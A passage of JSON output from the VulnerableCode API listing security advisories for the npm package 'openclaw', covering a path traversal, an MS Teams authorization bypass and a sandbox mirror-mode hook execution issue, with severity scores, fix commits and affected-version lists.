"VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41398", "GHSA-4p4f-fc8q-84m3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9cd-65tf-p3f8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89738?format=api", "vulnerability_id": "VCID-vktg-77tu-vycv", "summary": "OpenClaw: Path traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n## Summary\nPath traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 ACP dispatch still reads attachment paths outside the guarded attachment-cache or root checks, and the root-enforcement fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d` — 2026-03-30T14:04:02+01:00\n\nOpenClaw thanks @north-echo for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62" }, { "reference_url": "https://github.com/advisories/GHSA-58q2-7r52-jq62", "reference_id": "GHSA-58q2-7r52-jq62", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-58q2-7r52-jq62" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-58q2-7r52-jq62" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vktg-77tu-vycv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91432?format=api", "vulnerability_id": "VCID-vm8g-hrvu-quhm", "summary": "OpenClaw: MS Teams Feedback Invocation Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n## Summary\n\nMS Teams Feedback Invoke Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMicrosoft Teams feedback invokes previously bypassed sender authorization and could record feedback or trigger reflection for unauthorized senders. Commit `c5415a474bb085404c20f8b312e436997977b1ea` applies the same DM and group authorization checks to feedback invokes.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c5415a474bb085404c20f8b312e436997977b1ea`.\n\n## Fix Commit(s)\n\n- `c5415a474bb085404c20f8b312e436997977b1ea`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35654", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12423", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12387", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12424", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35654" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35654", "reference_id": "CVE-2026-35654", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35654" }, { "reference_url": "https://github.com/advisories/GHSA-rf6h-5gpw-qrgq", "reference_id": "GHSA-rf6h-5gpw-qrgq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rf6h-5gpw-qrgq" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke", "reference_id": "openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35654", "GHSA-rf6h-5gpw-qrgq" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vm8g-hrvu-quhm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88996?format=api", "vulnerability_id": "VCID-vqrj-z6tx-rff2", "summary": "OpenClaw: OpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n## Summary\nOpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped <=2026.3.22 OpenShell mirror sync, but exploit needs mirror mode plus hooks enabled plus explicit hook opt-in plus restart, so high is overstated even though the direct fix shipped in v2026.3.28.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41355", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02672", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02725", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0272", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41355" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41355", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41355" }, { "reference_url": "https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": 